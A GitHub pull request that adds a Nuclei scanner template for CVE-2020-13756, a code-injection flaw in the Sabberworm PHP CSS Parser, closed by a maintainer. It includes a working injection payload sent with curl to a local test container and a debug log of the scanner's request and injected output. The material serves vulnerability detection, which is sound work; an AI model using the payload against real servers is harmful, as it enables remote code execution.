Add CVE-2020-13756 Sabberworm PHP CSS Parser RCE Template

[KrE80r]

/claim #14249

PR Information

Note

Public vulnerable environment available: https://github.com/KrE80r/CVE-2020-13756-env

One-liner to spin up: docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

• Added CVE-2020-13756 template for Sabberworm PHP CSS Parser RCE
• References:
  • https://nvd.nist.gov/vuln/detail/CVE-2020-13756
  • MyIntervals/PHP-CSS-Parser@2ebf59e
  • http://seclists.org/fulldisclosure/2020/Jun/7
  • http://packetstormsecurity.com/files/157923/Sabberworm-PHP-CSS-Code-Injection.html
  • GHSA-phrq-v4q2-hmq6

Template validation

• Validated with a host running a vulnerable version and/or configuration (True Positive)
• Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerable Environment: https://github.com/KrE80r/CVE-2020-13756-env

# Quick setup
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

# Verify RCE
curl "http://localhost:8080/?n=100;printf(%22TEST%22);"
# Should output "TEST" at start of response

Debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2020-13756] Dumped HTTP request for http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);

GET /?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22); HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2020-13756] Dumped HTTP response http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Sat, 06 Dec 2025 09:25:00 GMT
Server: Apache/2.4.56 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/8.0.30

36Sw5wftjkmzirlc8KNRfAw4VqR<pre>Array
(
    [0] => Sabberworm\CSS\Property\Selector Object
        (
            [sSelector:Sabberworm\CSS\Property\Selector:private] => #test .help
            [iSpecificity:Sabberworm\CSS\Property\Selector:private] => 110
        )

)
</pre>
[CVE-2020-13756] [http] [critical] http://localhost:8080/?n=100;printf(%2236Sw5wftjkmzirlc8KNRfAw4VqR%22);
[INF] Scan completed in 5.679046ms. 1 match found.

False Positive Test (Patched Version 8.3.1)

[INF] Scan completed in 5.14455ms. No results found.

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[theamanrawat]

Thank you so much for sharing this template with the community and contributing to this project 🍻

This cannot be detected in a normal template. We need a fuzzing template for this CVE, and the fuzzing template is not a part of the bounty claim program. For this reason, we are closing this PR and the issue.

We're looking forward to your continued contributions!